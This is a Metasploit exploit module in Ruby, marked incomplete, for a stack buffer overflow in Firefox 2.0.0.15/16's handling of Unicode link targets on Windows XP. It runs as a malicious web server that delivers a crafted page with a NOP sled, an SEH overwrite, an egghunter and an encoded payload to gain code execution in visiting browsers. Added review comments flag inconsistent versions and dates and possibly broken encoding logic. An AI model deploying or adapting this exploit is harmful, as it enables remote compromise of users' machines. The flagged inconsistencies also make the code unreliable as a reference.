##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class MetasploitModule < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server: every client that requests the
	# served URI gets the single HTML page assembled in on_request_uri.
	#
	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Egghunter

	# Registers the module's metadata with the framework.
	#
	# Points worth checking, all visible in the literal below:
	# - 'Name' says 2.0.0.16 while the only 'Targets' entry names
	#   2.0.0.15 -- NOTE(review): confirm which version is meant.
	# - 'Description' is empty and the name is tagged [INCOMPLETE].
	# - 'DisclosureDate' is Sep 25 2009 although the CVE identifier is a
	#   2008 number -- NOTE(review): confirm the date.
	# - 'DisableNops' => true: the framework will not prepend its own NOP
	#   sled; the sled is built by hand in on_request_uri instead.
	# - 'BadChars' lists a single byte, "\x5d".
	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Firefox 2.0.0.16 Unicode Link Target stack buffer overflow',
			'Description'    => %q{

			},
			'License'        => MSF_LICENSE,
			'Author'         => [
									'Dominic Chell <dmc@deadbeef.co.uk>', # original exploit
									'egypt',                              # Metasploit conversion
								],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2008-0016'],
					['MIL', '9663']
				],
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x5d",
					'StackAdjustment' => -3500,
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					[ 'Firefox 2.0.0.15 on Windows XP SP0-SP3', 
						{
							'Platform'   => 'win',
							'Arch'       => ARCH_X86,
							'Ret'        => 0x603711e7, # pop/pop/ret - xpcom_core.dll
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Sep 25 2009'
			))

	end

	# HTTP request handler: builds and sends the page for one client.
	#
	# @param cli     the connected client; only cli.peerhost is read here
	#                (for the status line) before being handed back to
	#                regenerate_payload / send_response_html
	# @param request the incoming HTTP request; not inspected by this method
	# @return nil when regenerate_payload returns nil, otherwise whatever
	#         send_response_html returns
	def on_request_uri(cli, request)
		print_status("Sending #{self.name} to #{cli.peerhost}")
		# Re-generate the payload for this client; give up if that fails.
		# NOTE(review): the local `p` is not read again after this line --
		# the page body below uses payload.encoded instead.
		return if ((p = regenerate_payload(cli)) == nil)

		# hunter[0] is the egghunter stub, hunter[1] the egg tag it looks for.
		hunter = generate_egghunter()
		egg    = hunter[1]

		# Link-target buffer: a 3402-byte 0x90 sled, a 4-byte "next SEH"
		# slot, the target's return address (little-endian), 10 more 0x90
		# bytes, the egghunter stub, then 0xCC padding.  The last line
		# appends the two-byte string (5000 - pattern.length) times, so the
		# finished buffer is longer than 5000 bytes.
		pattern = "\x90" * 3402
		pattern << "\xeb\x10\x90\x90"  # ptr to next seh
		pattern << [target.ret].pack("V")
		pattern << "\x90" * 10
		#pattern << "\xCC"
		#pattern << ((255.downto(0)).collect { |b| [b].pack("c") }).join
		pattern << hunter[0]
		pattern << "\xCC\xCC" * (5000 - pattern.length) 

		# Page layout: the egg tag (twice) followed by the encoded payload
		# inside a "<!CDATA[ ... ]>" block, then a single link whose href is
		# "\x01" + "xx://dmc" + the converted "\xc3\xba" bytes + "/" + the
		# entity-encoded buffer.  The page declares charset=utf-8 both in
		# the <meta> tag and in the Content-Type header sent below.
		# NOTE(review): Rex::Text.to_unicode is called with type "utf-8" on
		# bytes that already spell U+00FA in UTF-8; what Rex emits for that
		# combination is not visible here -- verify against Rex::Text.
		# Note that entity_encode mutates `pattern` in place (see below).
		html = "<meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\" />\n<html>\n<body>\n"
		html << "<!CDATA[" + egg + egg + payload.encoded + "]>\n"
		html << "<a href=\""
		html << "\x01"
		html << "xx://dmc"
		html << Rex::Text.to_unicode("\xc3\xba", "utf-8")
		html << "/"
		html << entity_encode(pattern)
		html << "\" >s</a>"
		html << "\n</body>"
		html << "\n</html>"
	
		# Debug output: hex dump of the encoded payload on the console.
		print_line Rex::Text.to_hex_dump(payload.encoded)
	
		send_response_html(cli, html, { "Content-Type" => "text/html;charset=utf-8" })
	end

	# Turns a byte string into HTML numeric character references, one
	# "&#xHHHH;" per 16-bit unit, with each pair of bytes swapped
	# (a[1] before a[0], a[3] before a[2]).
	#
	# @param str [String] bytes to encode.  MUTATED IN PLACE: the padding
	#   loop appends to the caller's string, so `pattern` in
	#   on_request_uri is longer after this call than before.
	# @return [String] a new string holding the references
	#
	# Behaviour as written:
	# - the loop appends (str.length % 4) copies of the last byte, which
	#   is not the same as padding the length up to the next multiple of
	#   4 (the comment says "even length"; the code uses modulo 4);
	# - scan(/..../) only yields complete 4-byte chunks, so any trailing
	#   remainder shorter than 4 bytes is silently left out of `enc`;
	# - NOTE(review): sprintf("%02x", a[1]) expects an Integer; String#[]
	#   with an Integer index returns a byte value on Ruby 1.8 but a
	#   one-character String on 1.9+ -- confirm the Ruby version this
	#   module is meant to run on.
	def entity_encode(str)
		# make sure it's even length by padding with the last character
		(str.length % 4).times {
			str << str[str.length - 1]
		}
		enc = ""
		str.scan(/..../).each { |a|
			enc << sprintf("&#x%02x%02x;&#x%02x%02x;", a[1], a[0], a[3], a[2])
		}
		return enc
	end
end
